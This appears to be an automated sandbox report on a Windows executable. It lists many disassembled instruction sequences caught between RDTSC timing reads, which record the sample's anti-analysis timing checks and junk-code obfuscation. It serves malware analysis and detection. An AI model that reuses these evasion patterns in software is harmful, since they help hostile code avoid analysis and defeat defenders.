Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B97C2 second address: 12B9873 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F1DD4808488h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 or dword ptr [ebp+12457E45h], edi 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+12451424h], ecx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F1DD4808488h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000016h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f pushad 0x00000050 call 00007F1DD4808499h 0x00000055 mov edi, 19F34555h 0x0000005a pop eax 0x0000005b add dword ptr [ebp+1246C223h], ebx 0x00000061 popad 0x00000062 xchg eax, esi 0x00000063 jmp 00007F1DD4808493h 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F1DD4808499h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B9873 second address: 12B9879 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B8A2C second address: 12B8A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BA896 second address: 12BA8F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DD489F5A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov bh, 61h 0x0000000c push 00000000h 0x0000000e sub dword ptr [ebp+122D19F4h], eax 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F1DD489F598h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov ebx, 5649716Fh 0x00000035 xchg eax, esi 0x00000036 jmp 00007F1DD489F59Fh 0x0000003b push eax 0x0000003c push esi 0x0000003d push ecx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B9AB5 second address: 12B9AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BD8A9 second address: 12BD8CE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1DD489F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1DD489F5A9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BD98E second address: 12BD992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BC8FC second address: 12BC920 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DD489F59Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1DD489F59Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BC920 second address: 12BC938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DD4808494h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BE807 second address: 12BE80F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BFA6E second address: 12BFA74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BFA74 second address: 12BFA87 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F1DD489F598h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C26AC second address: 12C2728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 js 00007F1DD480848Ch 0x0000000d jo 00007F1DD4808486h 0x00000013 popad 0x00000014 mov dword ptr [esp], eax 0x00000017 mov ebx, 665B8D77h 0x0000001c mov di, 4238h 0x00000020 push 00000000h 0x00000022 jmp 00007F1DD4808493h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007F1DD4808488h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 push esi 0x00000044 mov edi, dword ptr [ebp+122D2D2Eh] 0x0000004a pop ebx 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jbe 00007F1DD480849Ch 0x00000054 jmp 00007F1DD4808496h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C186A second address: 12C186F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12CA3E7 second address: 12CA3ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C9AD1 second address: 12C9ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F1DD489F596h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C9D8B second address: 12C9DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1DD4808486h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jng 00007F1DD4808486h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C9ED2 second address: 12C9ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C9ED9 second address: 12C9EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C9EE3 second address: 12C9F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F1DD489F5A8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12CE78F second address: 12CE7A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp+04h], eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F1DD4808486h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12CE7A1 second address: 12CE7A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12CE7A7 second address: 12CE7AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12CE8B4 second address: 12CE8B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D40C1 second address: 12D40E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F1DD4808496h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D40E1 second address: 12D40F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1DD489F5A0h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D40F8 second address: 12D4100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125F5BF second address: 125F5CB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125F5CB second address: 125F5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D36EC second address: 12D370F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1DD489F5A8h 0x0000000b popad 0x0000000c push ebx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D385B second address: 12D387D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DD4808496h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F1DD4808488h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D964A second address: 12D964E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D964E second address: 12D966F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1DD480848Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F1DD4808486h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D97BB second address: 12D97C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D9927 second address: 12D993E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DD480848Dh 0x00000007 jg 00007F1DD480848Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D9C02 second address: 12D9C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F1DD489F596h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F1DD489F5A3h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jne 00007F1DD489F596h 0x00000020 jmp 00007F1DD489F5A5h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D9D93 second address: 12D9D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D9345 second address: 12D9377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1DD489F5A9h 0x0000000e push esi 0x0000000f jmp 00007F1DD489F59Eh 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D9377 second address: 12D939B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DD4808490h 0x00000009 jmp 00007F1DD4808490h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12DA2F8 second address: 12DA307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1DD489F59Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12DA307 second address: 12DA30E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12DA582 second address: 12DA58C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F1DD489F596h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1267DCC second address: 1267DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1267DD2 second address: 1267DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F1DD489F5A4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1267DF1 second address: 1267DF7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1267DF7 second address: 1267E0C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1DD489F598h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d js 00007F1DD489F59Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E07D0 second address: 12E07E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F1DD4808486h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e je 00007F1DD48084A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E07E8 second address: 12E07F6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1DD489F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E07F6 second address: 12E07FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E7457 second address: 12E7478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F1DD489F5A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E7478 second address: 12E7497 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1DD4808493h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E7648 second address: 12E764D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E7A3B second address: 12E7A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E7A41 second address: 12E7A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E7A46 second address: 12E7A74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F1DD4808486h 0x00000009 jc 00007F1DD4808486h 0x0000000f jne 00007F1DD4808486h 0x00000015 jmp 00007F1DD4808495h 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E7F36 second address: 12E7F3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E7F3B second address: 12E7F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E7F43 second address: 12E7F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F1DD489F59Ch 0x00000010 jo 00007F1DD489F596h 0x00000016 ja 00007F1DD489F596h 0x0000001c popad 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 jnl 00007F1DD489F596h 0x00000026 pushad 0x00000027 popad 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b push ecx 0x0000002c push ecx 0x0000002d pop ecx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1293243 second address: 1293247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1293247 second address: 1293263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1DD489F5A6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1293263 second address: 129326B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129326B second address: 129326F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A905B second address: 12A905F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A905F second address: 12A90A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov cl, 07h 0x0000000c lea eax, dword ptr [ebp+1247ED9Eh] 0x00000012 call 00007F1DD489F5A1h 0x00000017 sub edx, dword ptr [ebp+122D2E22h] 0x0000001d pop ecx 0x0000001e mov ecx, dword ptr [ebp+122D2C5Ah] 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F1DD489F5A5h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A90A7 second address: 12A90AC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A941A second address: 12A9425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F1DD489F596h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A9425 second address: 12A9431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A9528 second address: 12A952C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A952C second address: 12A9532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A9532 second address: 12A9548 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1DD489F598h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jbe 00007F1DD489F59Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A98B0 second address: 12A98B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A9E79 second address: 12A9E7F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A9E7F second address: 12A9EEC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1DD480849Ah 0x00000008 jmp 00007F1DD4808494h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 adc cl, FFFFFFA5h 0x00000015 mov dword ptr [ebp+1246C223h], esi 0x0000001b push 0000001Eh 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007F1DD4808488h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 mov edx, esi 0x00000039 cmc 0x0000003a nop 0x0000003b push edi 0x0000003c pushad 0x0000003d pushad 0x0000003e popad 0x0000003f jnc 00007F1DD4808486h 0x00000045 popad 0x00000046 pop edi 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F1DD480848Eh 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A9EEC second address: 12A9EF6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1DD489F59Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AA1D7 second address: 12AA1DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AA289 second address: 1293243 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DD489F5A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F1DD489F59Ch 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 or edi, 7CEF899Ah 0x00000019 call dword ptr [ebp+122D290Bh] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EC085 second address: 12EC08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EC08B second address: 12EC08F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EC08F second address: 12EC093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EC093 second address: 12EC099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EC099 second address: 12EC0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1DD4808496h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1DD4808499h 0x00000012 jmp 00007F1DD4808491h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EC23E second address: 12EC24A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EC3F2 second address: 12EC405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DD480848Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EC558 second address: 12EC55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EC55C second address: 12EC560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EC560 second address: 12EC566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
